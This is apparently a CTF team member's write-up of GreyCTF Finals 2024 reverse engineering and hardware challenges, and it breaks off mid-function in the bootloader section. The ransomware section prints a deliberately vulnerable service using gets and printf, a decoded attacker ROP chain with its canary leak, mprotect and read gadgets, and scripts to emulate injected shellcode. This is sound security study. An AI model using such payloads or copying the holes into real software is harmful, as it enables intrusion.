GreyCTF Finals 2024
6596 words | 31 minutes
This year, I competed in NUS Greyhat’s GreyCTF and managed to win first place with my team slight_smile
. It was fun as hell and I had a blast playing the CTF, with the fight between the top 3 keeping us up for the whole 24 hours.
Fig: Not even close (I lie through my teeth) |
For this CTF, I primarily worked on the rev and hardware challenges and entirely choked the blockchain category (which I later solved after the CTF).
I won’t include the full source or content of every challenge, but you can view it yourself here: https://github.com/NUSGreyhats/greyctf24-challs-public/tree/main/finals
Reverse Engineering
Hungry Ghost Festival
Hungry Ghost Festival is a Heaven’s Gate challenge, where we go from a 64-bit program to run some 32-bit shellcode. We’re given two files, a challenge binary and gate.bin
.
Running the binary presents us with some cute ASCII art, a hash and some melancholic text:
Fig: Program execution output |
Decompiling the binary in Ghidra gives us the gist of what’s going on. I’ve thrown in some labels into the decompilation output to make reading easier.
Going into entry
then __libc_start_main
, we arrive at main
:
1int main(int argc,char *argv)
2
3{
4 time_t currTime;
5 long pTrace_check;
6
7 get_argv_md5(*(undefined8 *)argv);
8 printf(&DAT_00102030,&DAT_00105040); // prints the art
9 currTime = time((time_t *)0x0);
10 if (currTime == 1722700800) {
11 pTrace_check = ptrace(PTRACE_TRACEME);
12 if (pTrace_check != -1) {
13 execute_gate(*(undefined8 *)argv);
14 }
15 }
16 return 0;
17}
We can see there are two barriers to the execution of the rest of the program, which is the time having to be a specific timestamp and a ptrace
check to see if we’re in a debugger. This is trivial to defeat in gdb
, both just requiring you to break execution before the checks and just jump over them. (Alternatively, you can patch the binary to invert the checks, which is the even lazier method which I employed).
Now, we can look at the execute_gate
function:
1void execute_gate(void)
2
3{
4 int __fd;
5 void *__s;
6
7 __fd = open("gate.bin",0);
8 __s = mmap((void *)0x0,0x1000,7,0x42,__fd,0);
9 *(undefined4 *)((long)__s + 0x500) = _DAT_00105040;
10 memfrob(__s,0x1000);
11 return;
12}
We can see that it reads the data from gate.bin
, allocates memory for it, runs memfrob
(which just xor decodes it against 42), then returns. The return here is deceptive, as looking at the actual assembly, we find that the function ends with a retf
:
0010131c e8 df fd CALL <EXTERNAL>:: void * memfrob(void * __s, size_
ff ff
00101321 48 c7 c3 MOV RBX,0x23
23 00 00 00
00101328 48 c1 e3 20 SHL RBX,0x20
0010132c 48 01 d8 ADD RAX,RBX
0010132f 50 PUSH RAX
00101330 cb RETF
00101331 90 ?? 90h
00101332 c9 ?? C9h
00101333 c3 ?? C3h
The retf
lets us switch to 32-bit mode and jumps execution to where we want, which in this case is the binary we just loaded. Being lazy, we can run the binary in gdb
and just get to this point, then dump the instructions following the current rip
.
0x40000000: xchg edi,esp
0x40000002: add esp,0x520
0x40000008: xor ebx,ebx
0x4000000a: xor ecx,ecx
0x4000000c: push 0x1a
0x4000000e: pop rax
0x4000000f: int 0x80
0x40000011: cmp eax,0xffffffff
0x40000014: jne 0x4000001d
0x40000016: xor ebx,ebx
0x40000018: push 0x1
0x4000001a: pop rax
0x4000001b: int 0x80
Our first bit of shellcode is Yet Another P-Trace Check (as eax = 0x1a
, the interrupt is sys_ptrace
), where the program exits (interrupt on eax = 0x1
) if it fails.
We defeat this check by setting eax
to 0, and carry on.
0x4000001d: mov ebx,esp
0x4000001f: xor ecx,ecx
0x40000021: push 0x4e
0x40000023: pop rax
0x40000024: int 0x80
Our next interrupt is sys_gettimeofday
. Given that we manipulated the time earlier, we should probably edit the struct in memory (location pointed in rsp
) to reflect that. From the spec, we can see the struct looks like this:
struct timeval {
time_t tv_sec; /* seconds */
suseconds_t tv_usec; /* microseconds */
};
We edit tv_sec
to be 0x66ae5400
and tv_usec
to be 0x00000000
.
The rest of the shellcode is just a bunch of calls to sys_write
to std_out
, which is our flag being printed.
Flag: grey{tr1ppy_4ss_r3v3rs1ng_ch4ll3ngexd}
Overly Simplified Rev Chall
This is a nasty challenge whereby there are fuckall structures to work with. It’s a “flat” binary with no functions or stack and calls for some de-obfuscation. No decompilation to work with because everything is screwed up, so we rely on the execution flow graph.
From what I’ve seen before, operations like xor
, cmp
, test
are usually a nice indicator of actual program logic, so we look out for those.
Fig: Program execution output |
This program is really simple: reads in a flag input, checks if its correct, print, exit.
We first start by determining where this flag is actually being read into. With gdb
, we interrupt the program once the prompt appears to get ourselves a place to break.
Fig: Breaking right after input prompt |
We set a breakpoint at 0x4011e1
, re-run the program after putting in some input and inspect the registers:
Fig: Stepping one after, we can now see where the input is stored! |
Our input string is written to 0x4040c0
, and we jump our $rsp
over to 0x4041c0
. $rax
stores the length of our string, which is basically immediately used for a newline check:
●→ 0x4011e1 lea rsp, ds:0x4041c0
0x4011e9 pop rbx
0x4011ea lea rsp, [rbx+rax*1-0x1]
0x4011ef pop rcx
0x4011f0 cmp cl, 0xa
The last instruction there compares the last character of the string against 0xa
, which we know to be \n
.
Laziness then overwhelms me, and looking at the flow graph, we have some sort of compare a few loops later
Fig: We look at 0x40127d , where some compare occurs |
Placing a breakpoint there, we see that $rcx
holds our input length, so we’ve know there’s a check for a string length of 0x28 == 40
, thus we make an assumption that this is how long our flag has to be. This is how most of our reversing flow is gonna go for the remainder of this challenge: skipping past large swathes of static reversing by whacking breakpoints.
We actually get to skip a massive portion of the program in this one move, which is a huge move for my sanity.
Fig: Basically everything in this screenshot gets skipped, which is a massive dub |
We re-run our program with grey{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
to hit this 40 character requirement and press forward.
We spot two interesting comparisons at 0x401482
and 0x40149a
, so we put some breakpoints and step through.
Fig: The fragment we’re currently investigating |
We notice that $rcx
behaves as a counter in the later half of this loop, being compared against 0x5
. This is a fairly common pattern we find in asm and will be seeing more of it. What’s interesting is the cmp cl, r8b
which occurs at each iteration.
We see loads from the regions 0x4041c0
, 0x404070
and 0x404068
, which correspond to a pointer to some bytestring, a saved copy of the $rcx
counter and a pointer to our input string respectively. Using some intuition, we can discern that we’re reading characters from our input, performing some manipulations to it, and comparing it against something else. With the counter being restricted to 0x5
and our execution going so cleanly with our input string, we can determine this is a check for the grey{
part of the flag format!
Using vibes based analysis, we notice a similar code block later on which also has a xor r8d, 0xffffff80
followed by a cmp cl, r8b
.
Fig: Seeing double… |
Placing a breakpoint at 0x401c48
, we find that we’re able to reach that point of execution with our input string, cleanly jumping past a bunch of program logic again. The program clearly runs through all that stuff, however, so it might be important to look at again later.
Either way, we’re able to clear this cmp
5 times, which lends us to believe that we’re ingesting the whole string again since we can for sure pass the first 5 characters.
The check finally fails on the 6th character, which is where our input actually begins. So, let’s try and discern the logic here to work out how to get our flag. Thankfully for us, the addresses we looked at earlier correspond to similar things, so we can eyeball what’s going on here:
- We know that
0x404070
is a copy of the length counter, and it is first loaded into$rcx
- We know that
0x4041c0
is a pointer to some bytestring, and we add our counter to it, so we shift up by one character - We load this character into
$rcx
0x404068
doesn’t point to our input string anymore but instead some other bytestring, but judging by the program logic, it has to be related to our original input. This is loaded into$r9
- The length counter is then loaded in to
$r8
, which we add$r9
to, reading the next character in. $r8
is esentially being XOR’d against0x80
So we want to figure out what’s the deal with 0x404068
, which seems to be some modified version of our input string.
Skimming through the section we skipped past, we find a reference to this address and an xor
operation that occurs before it.
Fig: Mysterious XOR? |
Placing a breakpoint here, we notice that $rcx
actually carries the characters from our string and $r9
is filled with some byte every iteration which we XOR against. So now we know our input string has been XOR’d against some other string, so we can just pass in our all A flag to undo the XOR, then work backwards to get our flag string!
We first dump the final bytestring produced using our input:
gef➤ x/40b 0x4042e0
0x4042e0: 0x54 0x37 0xf4 0x93 0xbb 0x6e 0xb8 0x77
0x4042e8: 0xd8 0x39 0x13 0xe4 0x9a 0xb8 0x10 0xb6
0x4042f0: 0x18 0x45 0xe7 0xfd 0x92 0x4c 0x6f 0xf1
0x4042f8: 0x95 0x10 0x8c 0x0b 0x67 0xce 0xb1 0xc3
0x404300: 0x74 0x0e 0x64 0xd4 0x2d 0xfc 0xaa 0x54
We XOR this against grey{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
to retrieve the XOR key.
We then dump the bytestring our XOR’d input is compared against:
gef➤ x/40b 0x404020
0x404020: 0xd4 0xb7 0x74 0x13 0x3b 0xd8 0x2e 0xd3
0x404028: 0x53 0x87 0xb3 0x71 0x26 0x24 0xb9 0x01
0x404030: 0x88 0xe1 0x6c 0x68 0x27 0xd6 0xd0 0x50
0x404038: 0x10 0xb5 0x1b 0xa4 0xd6 0x66 0x1c 0x77
0x404040: 0xc5 0xa6 0xc9 0x60 0x9c 0x54 0x07 0xf9
Then we XOR all this against 0x80
.
>>> a = [0xd4, 0xb7, 0x74, 0x13, 0x3b, 0xd8, 0x2e, 0xd3, 0x53, 0x87, 0xb3, 0x71, 0x26, 0x24, 0xb9, 0x01, 0x88, 0xe1, 0x6c, 0x68, 0x27, 0xd6, 0xd0, 0x50, 0x10, 0xb5, 0x1b, 0xa4, 0xd6, 0x
66, 0x1c, 0x77, 0xc5, 0xa6, 0xc9, 0x60, 0x9c, 0x54, 0x07, 0xf9]
>>> b = [0x54, 0x37, 0xf4, 0x93, 0xbb, 0x6e, 0xb8, 0x77,0xd8, 0x39, 0x13, 0xe4, 0x9a, 0xb8, 0x10, 0xb6, 0x18, 0x45, 0xe7, 0xfd, 0x92, 0x4c, 0x6f, 0xf1, 0x95, 0x10, 0x8c, 0x0b, 0x67, 0xce, 0xb1, 0xc3, 0x74, 0x0e, 0x64, 0xd4, 0x2d, 0xfc, 0xaa, 0x54]
>>> c = list(b"grey{" + b"A"*34 + b"}")
>>> ''.join(chr(a[i]^b[i]^c[i]^0x80) for i in range(0x28))
'grey{wWeJ\x7faT}]hvQeJTt[~`DdVnpilupilupilP'
Wait. That doesn’t look like a flag.
What we forgot to consider is that the string that our input is XOR’d against is likely dynamic in some sense and likely dependent on our input itself. However, by giving that massive block we skipped a cursory look, we can tell that the generated XOR byte for character n
is made up of manipulations to the characters [0, n-1]
, so we thankfully can just go character by character to get our flag.
So the flow is simple:
- Breakpoint at the
cmp cl, r8b
at0x401c48
- When we reach a new character that fails the check, we dump the byte at
0x4042e0 + offset
,0x404020 + offset
- XOR those bytes against
0x80
and0x41
(since we’d still be using the placeholderA
character there) to retrieve the actual character - Repeat execution with the new prefix string
This can be automated with r2 or some python gdb wrapper, but during the CTF itself I just whacked all 40 characters by hand.
Flag: grey{wasnt_that_fun_and_easy_XDXDXDXDXD}
A Sky Full Of Stars
We’re presented with a binary which you pipe some input into and produces a corresponding hash. We can replicate this with a simple echo -n <string> | ./stars
, so we start spamming some random inputs.
Fig: The Scientific Method |
Some spamming later, we find that we only get an output when we have a multiple of 3 wrapped in the braces, and our target flag has 21 characters wrapped in there.
I will be perfectly honest: I did not bother statically reversing this AT ALL. The challenge gets its name from what the decompilation output looks like:
Fig: Truly, a sky full of stars |
Derefs on top of derefs… yeah, no thanks.
Something noticeable is that changing the characters of the flag one by one modifies the output in localised regions, which we can discern just corresponds to the position of the modified character.
Fig: The Scientific Method, Part 2 |
Modifying one character doesn’t always lead to just one byte in the output changing, but we can see that it’s consistent up until the position of the changed character. This does mean that for every increasing subportion of the output that we match, there would be multiple possible prefix strings that produce the correct output, but we anticipate that by the time we reach the end of the flag itself we would converge to one solution.
I actually fucked up my bruteforce script during the CTF due to some incorrectly placed break
in my script, but thankfully my teammate jiajie
bothered to tackle this challenge himself and came to basically the same script as me (although he did bother with some static reverse).
Fig: Re: Implementing a bruteforce script |
We just directly implement the idea:
1from pwn import *
2import itertools
3import string
4context.log_level = 'error'
5
6
7def main():
8 solved = ""
9 target = b"3082d99f70d36a8f0aad4d95e47c22e6ec9ec0bbc8afd372651a29"
10 starts = [""]
11
12 charset = string.printable
13
14 while True:
15 new = []
16 solved = len(starts[0])
17
18 if solved == 22:
19 for start in starts:
20 test = "grey{" + start
21 io = process(f"echo -n {test} | ./stars", shell=True)
22 output = io.recvall()[:-1]
23 print(test)
24 print(output)
25 if output == target:
26 return
27
28 for start in starts:
29 for c in charset:
30 if len(start+c) == 23:
31 return
32 test = "grey{" + start + c + "a"*(22-len(start)-1)
33 io = process(f"echo -n {test} | ./stars", shell=True)
34 output = io.recvall()[8:8+2*len(start+c)]
35 if output == target[8:8+2*len(start+c)]:
36 print(test)
37 new.append(start+c)
38
39 if len(new) == 0:
40 print("Something went wrong lmao")
41 return
42
43 starts = [_ for _ in new]
44 print(starts)
45
46main()
There’s actually a cheeky newline at the end, so the wrapped flag is only 20 characters long.
Flag: grey{5uch_4_h34v3nly_v13w}
Ransomware
This was hands down one of the most fun reverse challenges I’ve played, and it took quite a hella long time for us to solve it during the CTF itself due to some of the tedium involved.
We’re given a few files: service
, service.c
which is the source code for the service
binary, libc.so.6
which is the libc the service uses (having provided libc 🙏 BLESS 🙏), an encrypted flag.txt
and capture.pcapng
.
Very interesting!
Let’s look at service.c
:
1#include <stdint.h>
2#include <stdio.h>
3#include <unistd.h>
4#include <stdlib.h>
5#include <string.h>
6
7
8void setup() {
9 setbuf(stdout, 0);
10 setbuf(stdin, 0);
11}
12
13char *usernames[] = {"jro", "a", "b", "c", "d"};
14char *passwords[] = {"Very secure pass", "a", "b", "c", "d"};
15int len = 5;
16
17int main(){
18 setup();
19 char username[0x10];
20 char password[0x10];
21
22 while(1) {
23 printf("Enter username: ");
24 gets(username);
25 int found_id = -1;
26 for(int i = 0; i < len; i++){
27 if(!strcmp(usernames[i], username)){
28 found_id = i;
29 break;
30 }
31 }
32 if(found_id == -1){
33 printf("OOps! ");
34 printf(username);
35 printf(" is not a valid username!\n");
36 } else {
37 printf("Enter password: ");
38 gets(password);
39 if(strcmp(passwords[found_id],password)){
40 printf("Wrong password!\n");
41 } else {
42 printf("Welcome ");
43 printf(username);
44 putchar('!');
45 putchar('\n');
46 return 0;
47 }
48 }
49 }
50}
It’s a simple program that reads in a username and password and compares it against some fixed values. What’s interesting is that our reads for username and password are done with gets
, which opens up an opportunity for a buffer overflow, and the username is directly printed with printf
, which opens up an opportunity for a format string exploit.
Why do I bring this up? Because looking at the pcap, we find logs of an attacker doing just that!
Here are some snippets of the pcap:
Fig: Format String attack performed~ |
Fig: Buffer Overflow attack performed |
This is followed up by what we can assume is shellcode being inputted as well.
Fig: Shellcode being sent? |
Judging by the output of the format string, we have a stack canary leak (0xb510a946cf71c600
) followed by a libc address leak (0x7f4ec997fc8a
).
Let’s look at the buffer overflow payload.
Breaking it up and fixing the endianness, we find that we can’t directly disassemble it as it’s actually a rop chain!
41414141414141414141414141414141414141414141414141414141414141414141414141414141 <- overflow
b510a946cf71c600 <- canary
0000000000000000
00007f4ec9a605ad
0000000000000007
00007f4ec9981b29
0000000000002000
00007f4ec9980215
0000000000401000
00007f4ec9a60430
00007f4ec9a605ad
0000000000002000
00007f4ec9981b29
0000000000401100
00007f4ec9980215
0000000000000000
00007f4ec9a56a10
00007f4ec9981b29
0000000000001000
00007f4ec9980215
0000000000401100
00007f4ec99f5370
0000000000401e2e
So, we first have to somehow reverse engineer the rop chain. We’ve been given the libc, so its a matter of determining the base address of libc, then dumping the gadgets appropriately.
We know that the libc base address would be something like 0x7f4ec9xxx000
, so we have to bruteforce those 4096 possible base addresses. We sort of have an idea of what gadgets we’re looking for: since we often see the address following a value, we can assume its some sort of pop reg
gadget, so we filter accordingly.
1from pwn import *
2# Load the libc file
3libc = ELF('./libc.so.6')
4
5# Function to find and print the gadget
6def find_gadget(base_address):
7 # Set the base address of the loaded libc
8 libc.address = base_address
9
10 gadget_address = 0x00007f4ec9981b29
11
12 # Try to find the gadget
13 try:
14 gadget = libc.disasm(gadget_address, 10) # Disassemble 10 bytes, adjust if needed
15
16 # If we reach here, it means we successfully disassembled the gadget
17 print(f"\nValid gadget found at base address: {hex(base_address)}")
18 print(f"Gadget at {hex(gadget_address)}:")
19 print(gadget)
20
21 # Check if it's a 'pop reg' gadget
22 is_pop_reg = 'pop' in gadget.split('\n')[0]
23 pop_reg_status = "This is a 'pop reg' gadget" if is_pop_reg else "This is not a 'pop reg' gadget"
24 print(pop_reg_status)
25
26 # Append to file
27 if is_pop_reg:
28 with open("offsets.txt", "a") as f:
29 f.write(f"Base Address: {hex(base_address)}\n")
30 f.write(f"Gadget Address: {hex(gadget_address)}\n")
31 f.write(f"Gadget:\n{gadget}\n")
32 f.write(f"{pop_reg_status}\n\n")
33
34 except:
35 # Suppressing the error, do nothing if gadget can't be disassembled
36 pass
37
38# Bruteforce the xxx values
39for xxx in range(0x1000): # Adjust range as needed
40 base_address = 0x7f4ec9000000 | (xxx << 12)
41 find_gadget(base_address)
We run this with different values for gadget_address
, and in fact we only need two iterations of this script to determine the correct base address:
Base Address: 0x7f4ec9958000
Gadget Address: 0x7f4ec9981b29
Gadget:
7f4ec9981b29: 5e pop rsi
7f4ec9981b2a: c3 ret
7f4ec9981b2b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
7f4ec9981b30: 48 rex.W
7f4ec9981b31: 8d .byte 0x8d
7f4ec9981b32: 3d .byte 0x3d
This is a 'pop reg' gadget
Base Address: 0x7f4ec9958000
Gadget Address: 0x7f4ec9981b29
Gadget:
7f4ec9981b29: 5e pop rsi
7f4ec9981b2a: c3 ret
7f4ec9981b2b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
7f4ec9981b30: 48 rex.W
7f4ec9981b31: 8d .byte 0x8d
7f4ec9981b32: 3d .byte 0x3d
This is a 'pop reg' gadget
Now that we have the libc base address as 0x7f4ec9958000
, we can fill in the blanks for the buffer overflow input.
41414141414141414141414141414141414141414141414141414141414141414141414141414141 <- overflow
b510a946cf71c600 <- canary
0000000000000000
00007f4ec9a605ad pop rdx; ret
0000000000000007
00007f4ec9981b29 pop rsi; ret
0000000000002000
00007f4ec9980215 pop rdi; ret
0000000000401000
00007f4ec9a60430 mov eax, 0xa; syscall; ret
^^ mprotect on 0x401000, of size 0x2000, set to 0x7 (probs rwx)
00007f4ec9a605ad pop rdx; ret
0000000000002000
00007f4ec9981b29 pop rsi; ret
0000000000401100
00007f4ec9980215 pop rdi; ret
0000000000000000
00007f4ec9a56a10 xor eax, eax; syscall
^^ syscall read on fd = 0, buf 0x401100, size 0x2000
00007f4ec9981b29 pop rsi; ret
0000000000001000
00007f4ec9980215 pop rdi; ret
0000000000401100
00007f4ec99f5370
^^ big ass gadget
0000000000401e2e
So we can see that we perform an mprotect
on a memory region, followed by a read
via stdin
to that memory region.
Finally, we call some massive gadget found at 0x7f4ec99f5370
.
7f4ec99f5370: 48 89 f8 mov rax, rdi ; rax = 0x0000000000401100
7f4ec99f5373: 48 85 f6 test rsi, rsi
7f4ec99f5376: 74 28 je 0x7f4ec99f53a0 ; not taken
7f4ec99f5378: 48 8d 0c 37 lea rcx, [rdi+rsi*1]
7f4ec99f537c: 83 e6 01 and esi, 0x1
7f4ec99f537f: 48 89 fa mov rdx, rdi
7f4ec99f5382: 74 0c je 0x7f4ec99f5390
7f4ec99f5384: 48 8d 57 01 lea rdx, [rdi+0x1]
7f4ec99f5388: 80 37 2a xor BYTE PTR [rdi], 0x2a
7f4ec99f538b: 48 39 d1 cmp rcx, rdx
7f4ec99f538e: 74 11 je 0x7f4ec99f53a1
7f4ec99f5390: 80 32 2a xor BYTE PTR [rdx], 0x2a
7f4ec99f5393: 48 83 c2 02 add rdx, 0x2
7f4ec99f5397: 80 72 ff 2a xor BYTE PTR [rdx-0x1], 0x2a
7f4ec99f539b: 48 39 d1 cmp rcx, rdx
7f4ec99f539e: 75 f0 jne 0x7f4ec99f5390
7f4ec99f53a0: c3 ret
It seems like what this gadget does is an XOR decode on the input against 0x2a
, and we finally return to 0x401e2e
, which will serve as the entry point for our shellcode which has been written to 0x401100
.
This shellcode is LONG AS HELL and I’d spare you the misery of looking through it in this post. Apparently it’s some implementation of ChaCha or something, but I honestly don’t really care. Long story short, it prints a sad face to stdout
(which we see in the pcap), takes in an input that goes into an mmap
’d region (which we also know happens from the pcap since a second stage is sent), and then does some manipulation to this input.
What’s probably most important it what comes at the end:
...
0x00401f6a: 4889d6 mov rsi, rdx
0x00401f6d: 4889c7 mov rdi, rax
0x00401f70: b800000000 mov eax, 0
0x00401f75: ffd1 call rcx
0x00401f77: 90 nop
0x00401f78: c9 leave
0x00401f79: c3 ret
So we know that whatever has been input and manipulated is eventually called. Great. Why don’t we just emulate it?
1from pwn import *
2
3context.terminal = ['st']
4context.arch = 'amd64'
5
6hex_string = "7f62a3cfa357d662a35fda62a37fc262edea2a2a2a2a252..."
7hex_string = hex_string.replace(" ", "").replace("0x", "")
8code = bytes.fromhex(hex_string)
9shellcode = bytes([b ^ 0x2a for b in code])
10
11with open("shellcode.bin", "wb") as f:
12 f.write(shellcode)
13
14io = gdb.debug_shellcode(shellcode, vma=0x0401100, gdbscript="""
15 b *0x401e2e
16 jump *0x401e2e
17 b *0x00401f75
18""")
19b = open("final.bin", "rb").read()
20io.sendline(b)
We store the second stage in shellcode.bin
and add a few breakpoints so that we can jump to the specified entrypoint of 0x401e2e
and then stop right before the call rcx
.
Doing this, we then jump execution to the second stage of the payload!
Fig: The shellcode sequel |
Stepping through execution, we get pretty far until we crash at some attempt to call a function from libc, which of course we don’t have loaded at the correct address.
We place a breakpoint at the first attempt to call
something:
Fig: Attempted call to a libc function |
So… assuming that all these calls in the shellcode will resolve to libc functions, we painstakingly place breakpoints on all of them, then manually resolve the symbols ourselves.
Let’s breakdown the final shellcode piece by piece together:
0x7257e81053ab: mov rdi,rax
=> 0x7257e81053ae: call 0x7257e81051f4; open(./flag.txt)
0x7257e81053b3: mov DWORD PTR [rbp-0x20],eax
0x7257e81053b6: lea rax,[rbp-0x70]
0x7257e81053ba: mov edx,0x21
0x7257e81053bf: mov esi,0x0
0x7257e81053c4: mov rdi,rax
0x7257e81053c7: call 0x7257e8105133; (memset of 33)
0x7257e81053cc: lea rcx,[rbp-0x70]
0x7257e81053d0: mov eax,DWORD PTR [rbp-0x20]
0x7257e81053d3: mov edx,0x20
0x7257e81053d8: mov rsi,rcx
0x7257e81053db: mov edi,eax
0x7257e81053dd: call 0x7257e810518b; (read to memset addr)
0x7257e81053e2: mov eax,DWORD PTR [rbp-0x20]
0x7257e81053e5: mov edi,eax
0x7257e81053e7: call 0x7257e8105153; (close fd)
We first make some call to open(./flag.txt)
and read the contents to an address that we freshly memset
.
0x7257e81053ec: lea rax,[rbp-0x80]
0x7257e81053f0: mov rsi,rax
0x7257e81053f3: mov edi,0x0
0x7257e81053f8: call 0x7257e81051ab; (clock_gettime)
0x7257e81053fd: mov rax,QWORD PTR [rbp-0x80]
0x7257e8105401: mov edi,eax
0x7257e8105403: call 0x7257e81051c7; (srand(epoch_seconds))
0x7257e8105408: mov DWORD PTR [rbp-0x24],0x20
We get the time and seed an srand
with it. Thankfully, by having the pcap, we know that the epoch the payload arrived at was 1720325377.019028720
, so we just work around that range.
0x7257e810540f: mov eax,DWORD PTR [rbp-0x24]
0x7257e8105412: cdqe
0x7257e8105414: mov rdi,rax
0x7257e8105417: call 0x7257e8105283; mmap(0, 0x20, -wx, 0x21, -1, 0x0)
0x7257e810541c: mov QWORD PTR [rbp-0x30],rax
0x7257e8105420: call 0x7257e8105210; get_pid
0x7257e8105425: mov DWORD PTR [rbp-0x34],eax
0x7257e8105428: mov DWORD PTR [rbp-0x14],0x0
0x7257e810542f: jmp 0x7257e81054d7
We mmap
another region and then make a call to get_pid
, which is spooky cuz it means there might be some forking logic.
This is immediately realised:
0x7257e8105434: call 0x7257e810523d; fork
0x7257e8105439: mov DWORD PTR [rbp-0x38],eax
0x7257e810543c: mov eax,0x0
0x7257e8105441: call 0x7257e81051df ; rand
We then do a bunch of manipulations which, erm, don’t seem to amount to much besides a call to usleep(1)
to screw with you.
0x7257e8105446: movsxd rdx,eax
0x7257e8105449: imul rdx,rdx,0x51eb851f
0x7257e8105450: shr rdx,0x20
0x7257e8105454: sar edx,0x5
0x7257e8105457: mov ecx,eax
0x7257e8105459: sar ecx,0x1f
0x7257e810545c: sub edx,ecx
0x7257e810545e: mov DWORD PTR [rbp-0x3c],edx
0x7257e8105461: mov edx,DWORD PTR [rbp-0x3c]
0x7257e8105464: imul edx,edx,0x64
0x7257e8105467: sub eax,edx
0x7257e8105469: mov DWORD PTR [rbp-0x3c],eax
0x7257e810546c: mov DWORD PTR [rbp-0x18],0x0
0x7257e8105473: jmp 0x7257e8105483
0x7257e8105475: mov edi,0x1
0x7257e810547a: call 0x7257e8105225 ; usleep(1)
0x7257e810547f: add DWORD PTR [rbp-0x18],0x1
0x7257e8105483: mov eax,DWORD PTR [rbp-0x18]
0x7257e8105486: cmp eax,DWORD PTR [rbp-0x3c]
0x7257e8105489: jl 0x7257e8105475
Now, we actually get to the juicy parts:
0x7257e810548b: mov eax,DWORD PTR [rbp-0x14] ; 0x0?
0x7257e810548e: movsxd rdx,eax
0x7257e8105491: mov rax,QWORD PTR [rbp-0x30] ; mmap
0x7257e8105495: add rax,rdx
0x7257e8105498: movzx eax,BYTE PTR [rax]
0x7257e810549b: test al,al
0x7257e810549d: jne 0x7257e81054e5
0x7257e810549f: mov eax,0x0
0x7257e81054a4: call 0x7257e81051df ; rand
0x7257e81054a9: mov ecx,eax
0x7257e81054ab: mov eax,DWORD PTR [rbp-0x14]
0x7257e81054ae: movsxd rdx,eax
0x7257e81054b1: mov rax,QWORD PTR [rbp-0x30]
0x7257e81054b5: add rax,rdx
0x7257e81054b8: mov edx,ecx
0x7257e81054ba: mov BYTE PTR [rax],dl ; store rand output in mmap
Here we mmap
another region of memory and then start storing the output of rand
in the mmap
’d region.
0x7257e81054bc: cmp DWORD PTR [rbp-0x38],0x0 ; checks child status
0x7257e81054c0: je 0x7257e81054d3
0x7257e81054c2: mov eax,0x0
0x7257e81054c7: call 0x7257e81051df ; rand
0x7257e81054cc: mov edi,eax
0x7257e81054ce: call 0x7257e81051c7 ; srand
0x7257e81054d3: add DWORD PTR [rbp-0x14],0x1 ; increment counter
0x7257e81054d7: mov eax,DWORD PTR [rbp-0x14]
0x7257e81054da: cmp eax,DWORD PTR [rbp-0x24] ; until 0x20
0x7257e81054dd: jl 0x7257e8105434
0x7257e81054e3: jmp 0x7257e81054e6
We then re-seed srand()
with the output of rand()
and we do this a total of 32 times. What we note is that each forked process will still write to the same mmap
’d region of memory, so we can actually mimic this process without performing a bunch of forks by simply doing something like
time_t seed = 1720325377;
srand(seed);
for (int i = 0; i < 32; i++) {
rand();
printf("\\x%hhx", rand());
srand(rand());
}
Skipping past a bit of shellcode, we then reach the actual encryption step:
0x7257e8105512: movzx ecx,BYTE PTR [rbp+rax*1-0x70] ; probably the flag
0x7257e8105517: mov eax,DWORD PTR [rbp-0x1c]
0x7257e810551a: movsxd rdx,eax
0x7257e810551d: mov rax,QWORD PTR [rbp-0x30] ; mmap address
0x7257e8105521: add rax,rdx
0x7257e8105524: movzx eax,BYTE PTR [rax]
0x7257e8105527: xor ecx,eax
0x7257e8105529: mov edx,ecx
0x7257e810552b: mov eax,DWORD PTR [rbp-0x1c]
0x7257e810552e: cdqe
0x7257e8105530: mov BYTE PTR [rbp+rax*1-0x70],dl
0x7257e8105534: add DWORD PTR [rbp-0x1c],0x1
0x7257e8105538: mov eax,DWORD PTR [rbp-0x1c]
0x7257e810553b: cmp eax,DWORD PTR [rbp-0x24] ; until 0x20
0x7257e810553e: jl 0x7257e810550d
Good ol’ XOR! We XOR the random bytes generated with the flag, and we conclude the shellcode with another open(./flag.txt)
and a write to it. Wonderful! Now all we have to do is replicate the random byte generation process, XOR it against our encrypted flag and we win.
However, as we were doing this, my teammate samuzora
realised that only a portion of the flag gets decrypted and the rest looks like garbage. This is actually due to the behaviour of all the forking being non-deterministic, which means that a few of the srand(rand())
iterations actually get skipped. But fortunately, this can be easily resolved by, well, skipping them based on manual observation.
Our final random key generation script looks like this:
1#include <stdio.h>
2#include <stdlib.h>
3
4int main() {
5 time_t seed = 1720325377;
6 srand(seed);
7
8 for (int i = 0; i < 32; i++) {
9 rand();
10 printf("\\x%hhx", rand());
11 if (i != 5 && i != 14 && i != 15 && i != 16 && i != 18 && i != 20 && i != 23 && i != 24 && i != 25) {
12 srand(rand());
13 }
14 }
15}
And once we XOR it against our encrypted flag…
key = b"\x2c\x29\xf9\x2c\x77\xa7\x71\xc7\x80\x31\x77\x96\xe9\xf5\x70\xa2\xaf\xbb\xcc\x8b\x0a\xe3\x6a\x70\x72\x6e\xed\x12\xb2\xa2\x13\xc7"
ct = open("./flag.txt", "rb").read()
print("".join([chr(i ^ j) for i, j in zip(ct, key)]))
We get the flag!
Flag: grey{r4n50m_m0r3_l1k3_r4nd0m_XD}
Hardware
Bootloader
This challenge is actually Yet Another Reverse Engineering challenge, so I’ve included it here.
This CTF came with a really cool and cute badge which itself made up the hardware challenges, being an STM32 based board.
Fig: Super Kawaii Badge |
This challenge requires us to enter bootloader mode on the board, which can be accomplished by setting BOOT1 high and setting BOOT0 low, and this brings up… a website??
Fig: The WebDFU utility |
It’s the WebDFU Utility, which also tells us what bootloader this board is running. What’s useful is the handy Firmware Upload button, which lets us dump the firmware of the board.
Reverse engineering STM32 firmware is non-trivial, but this super helpful blogpost details how we can recreate the memory regions that the firmware is loaded into, which lets us resolve a bunch of references and make the ARM decompilation super clean.
I won’t go over how the mappings can be done in Ghidra since the blogpost details it in far better clarity than I could ever hope to achieve. Either way, we trace back through the string reference to this challenge and find the function which validates the flag.
1void bootloader_chall(void)
2
3{
4 char cVar1;
5 int iVar2;
6 byte local_30 [36];
7
8 FUN_0800420a(0x80,PTR_s_Enter_flag_to_reboot_into_bootlo_08003df8);
9 FUN_080064ae(local_30,0,0x1f);
10 cVar1 = cmplen(local_30,30);
11 FUN_0800420a(0x80,PTR_BYTE_08003e08,local_30);
12 if (cVar1 == 30) {
13 iVar2 = 0;
14 do {
